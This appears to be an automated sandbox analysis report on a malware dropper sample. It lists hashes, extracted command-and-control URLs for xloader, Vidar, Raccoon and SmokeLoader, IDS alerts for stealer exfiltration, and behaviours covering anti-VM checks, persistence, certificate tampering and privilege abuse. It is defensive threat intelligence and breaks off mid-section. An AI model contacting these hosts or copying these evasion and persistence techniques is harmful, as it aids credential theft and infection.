Analysis
-
max time kernel
122s -
max time network
174s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
31-10-2021 07:58
Static task
static1
Behavioral task
behavioral1
Sample
Sun038db98f99bf9a.exe
Resource
win7-en-20210920
General
-
Target
Sun038db98f99bf9a.exe
-
Size
172KB
-
MD5
7c3cf9ce3ffb1e5dd48896fdc9080bab
-
SHA1
34b4976f8f83c1e0a9d277d2a103a61616178728
-
SHA256
b3049882301853eed2aa8c5ac99010dd84292d7e092eb6f4311fa535716f5d83
-
SHA512
52ec2ec50a2d4ca4f29e6b611176e37fee8693a7c34ec2197ec2ad250d525f607c3d4d70534520d1f5c16fd3f9231d261b00f8c3746d033eab1ed36cdde07473
Malware Config
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Extracted
vidar
41.6
937
https://mas.to/@lilocc
-
profile_id
937
Extracted
raccoon
8dec62c1db2959619dca43e02fa46ad7bd606400
-
url4cnc
http://telegin.top/capibar
http://ttmirror.top/capibar
http://teletele.top/capibar
http://telegalive.top/capibar
http://toptelete.top/capibar
http://telegraf.top/capibar
https://t.me/capibar
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4236 1904 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4860 1904 rundll32.exe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\igymXiYoKu13gldo2cV24SID.exe family_socelars C:\Users\Admin\Pictures\Adobe Films\igymXiYoKu13gldo2cV24SID.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 2012 created 3860 2012 WerFault.exe Idgt2_xevoseMbjWCCJmG_Xz.tmp PID 3196 created 3168 3196 WerFault.exe GsszvROIc777BZI8uRb94auq.exe -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3960-162-0x0000000000780000-0x0000000000856000-memory.dmp family_vidar behavioral2/memory/3960-158-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar -
Xloader Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\peVZ_JD1pJ9rKZUC5V1uN9_H.exe xloader C:\Users\Admin\Pictures\Adobe Films\peVZ_JD1pJ9rKZUC5V1uN9_H.exe xloader behavioral2/memory/1296-152-0x0000000002A40000-0x0000000002A69000-memory.dmp xloader -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
ShareFolder.exeShareFolder.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe -
Executes dropped EXE 29 IoCs
Processes:
HkYPWI9aKQ83BkX1tmb4PkBH.exeEokPGLmIU6f_A094eCm4ixtW.exepeVZ_JD1pJ9rKZUC5V1uN9_H.exehFBgXG1kL15D1QH2z3IQpdj5.exe3e9n_iZAxCcrAw489a4i_YhF.exeinU854R6rROYiSJmh8xYxToM.exejrRTQ4OfEZSYNWyLy6P_8o7p.exevy6NfB8MFQfwf7dqcTs4d7VI.exe348niyVABJJpEDLnX9LkeUO3.exeigymXiYoKu13gldo2cV24SID.execl49FjCLHtdGJS0qgRY_GIWk.exeGsszvROIc777BZI8uRb94auq.exeiNlffGo5eLVRM6CPJEHz_UIe.exedsx8NSUe9OeszftG2KwTJZCm.exeIdgt2_xevoseMbjWCCJmG_Xz.exe17t81FuvdBMrcTNzilmgcRH1.exe17t81FuvdBMrcTNzilmgcRH1.tmpIdgt2_xevoseMbjWCCJmG_Xz.tmpGzXwQLrWQrUilTPBbe4MHVGz.exeShareFolder.exeShareFolder.exekPBhgOaGQk.exesetup.exefoldershare.exefoldershare.exeQyjunukyfi.exeHedejaefygi.exeHaewebujegi.exeVashaezhufeho.exepid process 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 584 EokPGLmIU6f_A094eCm4ixtW.exe 3864 peVZ_JD1pJ9rKZUC5V1uN9_H.exe 2528 hFBgXG1kL15D1QH2z3IQpdj5.exe 3960 3e9n_iZAxCcrAw489a4i_YhF.exe 2456 inU854R6rROYiSJmh8xYxToM.exe 3860 jrRTQ4OfEZSYNWyLy6P_8o7p.exe 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe 1916 348niyVABJJpEDLnX9LkeUO3.exe 436 igymXiYoKu13gldo2cV24SID.exe 684 cl49FjCLHtdGJS0qgRY_GIWk.exe 3168 GsszvROIc777BZI8uRb94auq.exe 380 iNlffGo5eLVRM6CPJEHz_UIe.exe 1784 dsx8NSUe9OeszftG2KwTJZCm.exe 3704 Idgt2_xevoseMbjWCCJmG_Xz.exe 3712 17t81FuvdBMrcTNzilmgcRH1.exe 2216 17t81FuvdBMrcTNzilmgcRH1.tmp 3860 Idgt2_xevoseMbjWCCJmG_Xz.tmp 2300 GzXwQLrWQrUilTPBbe4MHVGz.exe 1816 ShareFolder.exe 1880 ShareFolder.exe 420 kPBhgOaGQk.exe 1228 setup.exe 1812 foldershare.exe 1612 foldershare.exe 392 Qyjunukyfi.exe 3900 Hedejaefygi.exe 1676 Haewebujegi.exe 1780 Vashaezhufeho.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
hFBgXG1kL15D1QH2z3IQpdj5.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion hFBgXG1kL15D1QH2z3IQpdj5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion hFBgXG1kL15D1QH2z3IQpdj5.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Sun038db98f99bf9a.exevy6NfB8MFQfwf7dqcTs4d7VI.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Sun038db98f99bf9a.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation vy6NfB8MFQfwf7dqcTs4d7VI.exe -
Loads dropped DLL 14 IoCs
Processes:
3e9n_iZAxCcrAw489a4i_YhF.exe17t81FuvdBMrcTNzilmgcRH1.tmpIdgt2_xevoseMbjWCCJmG_Xz.tmpGzXwQLrWQrUilTPBbe4MHVGz.exesetup.exemsiexec.exepid process 3960 3e9n_iZAxCcrAw489a4i_YhF.exe 3960 3e9n_iZAxCcrAw489a4i_YhF.exe 2216 17t81FuvdBMrcTNzilmgcRH1.tmp 3860 Idgt2_xevoseMbjWCCJmG_Xz.tmp 2300 GzXwQLrWQrUilTPBbe4MHVGz.exe 2300 GzXwQLrWQrUilTPBbe4MHVGz.exe 2300 GzXwQLrWQrUilTPBbe4MHVGz.exe 2300 GzXwQLrWQrUilTPBbe4MHVGz.exe 2300 GzXwQLrWQrUilTPBbe4MHVGz.exe 2300 GzXwQLrWQrUilTPBbe4MHVGz.exe 1228 setup.exe 1228 setup.exe 2232 msiexec.exe 2232 msiexec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\hFBgXG1kL15D1QH2z3IQpdj5.exe themida behavioral2/memory/2528-142-0x00000000011A0000-0x00000000011A1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
ShareFolder.exeShareFolder.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Tusheshudeshu.exe\"" ShareFolder.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Tusheshudeshu.exe\"" ShareFolder.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
hFBgXG1kL15D1QH2z3IQpdj5.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hFBgXG1kL15D1QH2z3IQpdj5.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ipinfo.io 19 ipinfo.io 64 ipinfo.io 65 ipinfo.io 83 ipinfo.io 134 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
hFBgXG1kL15D1QH2z3IQpdj5.exepid process 2528 hFBgXG1kL15D1QH2z3IQpdj5.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
peVZ_JD1pJ9rKZUC5V1uN9_H.execolorcpl.exedescription pid process target process PID 3864 set thread context of 3008 3864 peVZ_JD1pJ9rKZUC5V1uN9_H.exe Explorer.EXE PID 1296 set thread context of 3008 1296 colorcpl.exe Explorer.EXE -
Drops file in Program Files directory 10 IoCs
Processes:
EokPGLmIU6f_A094eCm4ixtW.exeShareFolder.exeShareFolder.exedescription ioc process File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe EokPGLmIU6f_A094eCm4ixtW.exe File created C:\Program Files\7-Zip\EOALRBGJQO\foldershare.exe.config ShareFolder.exe File created C:\Program Files (x86)\Windows Portable Devices\Tusheshudeshu.exe ShareFolder.exe File created C:\Program Files (x86)\Windows Portable Devices\Tusheshudeshu.exe.config ShareFolder.exe File created C:\Program Files (x86)\Internet Explorer\Tusheshudeshu.exe.config ShareFolder.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe EokPGLmIU6f_A094eCm4ixtW.exe File created C:\Program Files\7-Zip\EOALRBGJQO\foldershare.exe ShareFolder.exe File created C:\Program Files\Internet Explorer\WPKGUAPMAT\foldershare.exe ShareFolder.exe File created C:\Program Files\Internet Explorer\WPKGUAPMAT\foldershare.exe.config ShareFolder.exe File created C:\Program Files (x86)\Internet Explorer\Tusheshudeshu.exe ShareFolder.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1304 3860 WerFault.exe jrRTQ4OfEZSYNWyLy6P_8o7p.exe 3760 3860 WerFault.exe jrRTQ4OfEZSYNWyLy6P_8o7p.exe 832 3860 WerFault.exe jrRTQ4OfEZSYNWyLy6P_8o7p.exe 1708 3860 WerFault.exe jrRTQ4OfEZSYNWyLy6P_8o7p.exe 2040 3860 WerFault.exe jrRTQ4OfEZSYNWyLy6P_8o7p.exe 2012 3860 WerFault.exe jrRTQ4OfEZSYNWyLy6P_8o7p.exe 2012 3168 WerFault.exe GsszvROIc777BZI8uRb94auq.exe 500 3168 WerFault.exe GsszvROIc777BZI8uRb94auq.exe 1080 3168 WerFault.exe GsszvROIc777BZI8uRb94auq.exe 2040 3168 WerFault.exe GsszvROIc777BZI8uRb94auq.exe 3196 3168 WerFault.exe GsszvROIc777BZI8uRb94auq.exe 6528 2456 WerFault.exe inU854R6rROYiSJmh8xYxToM.exe -
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe nsis_installer_2 C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
cl49FjCLHtdGJS0qgRY_GIWk.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cl49FjCLHtdGJS0qgRY_GIWk.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cl49FjCLHtdGJS0qgRY_GIWk.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cl49FjCLHtdGJS0qgRY_GIWk.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
3e9n_iZAxCcrAw489a4i_YhF.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3e9n_iZAxCcrAw489a4i_YhF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3e9n_iZAxCcrAw489a4i_YhF.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1676 schtasks.exe 3824 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2016 timeout.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3312 taskkill.exe 3716 taskkill.exe 924 taskkill.exe 4456 taskkill.exe -
Processes:
igymXiYoKu13gldo2cV24SID.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e igymXiYoKu13gldo2cV24SID.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 igymXiYoKu13gldo2cV24SID.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Sun038db98f99bf9a.exeHkYPWI9aKQ83BkX1tmb4PkBH.exepid process 3608 Sun038db98f99bf9a.exe 3608 Sun038db98f99bf9a.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe 1072 HkYPWI9aKQ83BkX1tmb4PkBH.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3008 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
peVZ_JD1pJ9rKZUC5V1uN9_H.execolorcpl.execl49FjCLHtdGJS0qgRY_GIWk.exepid process 3864 peVZ_JD1pJ9rKZUC5V1uN9_H.exe 3864 peVZ_JD1pJ9rKZUC5V1uN9_H.exe 3864 peVZ_JD1pJ9rKZUC5V1uN9_H.exe 1296 colorcpl.exe 1296 colorcpl.exe 684 cl49FjCLHtdGJS0qgRY_GIWk.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
peVZ_JD1pJ9rKZUC5V1uN9_H.execolorcpl.exeWerFault.exeExplorer.EXEWerFault.exeWerFault.exeWerFault.exeWerFault.exeigymXiYoKu13gldo2cV24SID.exehFBgXG1kL15D1QH2z3IQpdj5.exetaskkill.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3864 peVZ_JD1pJ9rKZUC5V1uN9_H.exe Token: SeDebugPrivilege 1296 colorcpl.exe Token: SeRestorePrivilege 1304 WerFault.exe Token: SeBackupPrivilege 1304 WerFault.exe Token: SeDebugPrivilege 1304 WerFault.exe Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeDebugPrivilege 3760 WerFault.exe Token: SeDebugPrivilege 832 WerFault.exe Token: SeDebugPrivilege 1708 WerFault.exe Token: SeDebugPrivilege 2040 WerFault.exe Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeCreateTokenPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeAssignPrimaryTokenPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeLockMemoryPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeIncreaseQuotaPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeMachineAccountPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeTcbPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeSecurityPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeTakeOwnershipPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeLoadDriverPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeSystemProfilePrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeSystemtimePrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeProfSingleProcessPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeIncBasePriorityPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeCreatePagefilePrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeCreatePermanentPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeBackupPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeRestorePrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeShutdownPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeDebugPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeAuditPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeSystemEnvironmentPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeChangeNotifyPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeRemoteShutdownPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeUndockPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeSyncAgentPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeEnableDelegationPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeManageVolumePrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeImpersonatePrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: SeCreateGlobalPrivilege 436 igymXiYoKu13gldo2cV24SID.exe Token: 31 436 igymXiYoKu13gldo2cV24SID.exe Token: 32 436 igymXiYoKu13gldo2cV24SID.exe Token: 33 436 igymXiYoKu13gldo2cV24SID.exe Token: 34 436 igymXiYoKu13gldo2cV24SID.exe Token: 35 436 igymXiYoKu13gldo2cV24SID.exe Token: SeDebugPrivilege 2528 hFBgXG1kL15D1QH2z3IQpdj5.exe Token: SeDebugPrivilege 3312 taskkill.exe Token: SeDebugPrivilege 2012 WerFault.exe Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeShutdownPrivilege 3008 Explorer.EXE Token: SeCreatePagefilePrivilege 3008 Explorer.EXE Token: SeDebugPrivilege 500 WerFault.exe Token: SeDebugPrivilege 1080 WerFault.exe Token: SeDebugPrivilege 2040 WerFault.exe Token: SeDebugPrivilege 3716 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
